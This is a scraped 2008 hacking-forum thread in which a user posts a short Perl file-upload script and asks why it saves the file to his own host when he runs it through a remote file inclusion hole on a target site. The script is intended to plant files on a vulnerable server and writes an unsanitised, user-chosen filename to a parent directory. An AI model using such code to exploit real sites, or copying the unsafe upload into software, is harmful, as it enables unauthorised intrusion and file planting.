Follow us on Twitter!
Don't judge the unknown - Grindordie
Saturday, April 19, 2014
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 19
Guests Online: 17
Members Online: 2

Registered Members: 82838
Newest Member: w1zarrd
Latest Articles
View Thread

HellBound Hackers | Computer General | Web hacking

Author

Perl rfi

clone4
Member



Posts: 586
Location: He is back and he's bad!
Joined: 25.11.07
Rank:
Mad User
Posted on 14-05-08 09:07
ok so there is page vulnerable for rfi, but executes only perl scripts, I use script
Code


#!C:/Perl/bin/perl.exe

use CGI;
use File::Basename;

my $file_location = "../";
my $query = new CGI;
my $filename = $query->param("file");

my $upload_filehandle = $query->upload("file");

open ( UPLOADFILE, ">$file_location/$filename" ) ;


while ( <$upload_filehandle> )
{

print $query->header ( );
print $file_location;
print UPLOADFILE;
}

close UPLOADFILE;





but even despite this script is executed by the remote server, file is uploaded on the server where is the script, and since I use relative path it should work properly, any ideas why is that happening ?

thx


[img][/img]img164.imageshack.us/img164/5713/perlvl0.jpg

clone4.freehostia.com/ubuntu_3.png
spyware - "They see me trollin'..."
<yaragn> ever seen that movie? The Matrix?
<yaragn> with those green lines of flying text?
<yaragn> *THAT'S* Perl



Edited by clone4 on 14-05-08 09:10
clone_4@hotmail.com
Author

RE: Perl rfi

clone4
Member



Posts: 586
Location: He is back and he's bad!
Joined: 25.11.07
Rank:
Mad User
Posted on 14-05-08 21:39
nothing ?SadSad

**making sad eyes so somebody would help**

brb don't know what's wrong, I've double checked everything, and script really is executed on the server, and there seem to be no restrictions regarding to it


[img][/img]img164.imageshack.us/img164/5713/perlvl0.jpg

clone4.freehostia.com/ubuntu_3.png
spyware - "They see me trollin'..."
<yaragn> ever seen that movie? The Matrix?
<yaragn> with those green lines of flying text?
<yaragn> *THAT'S* Perl

clone_4@hotmail.com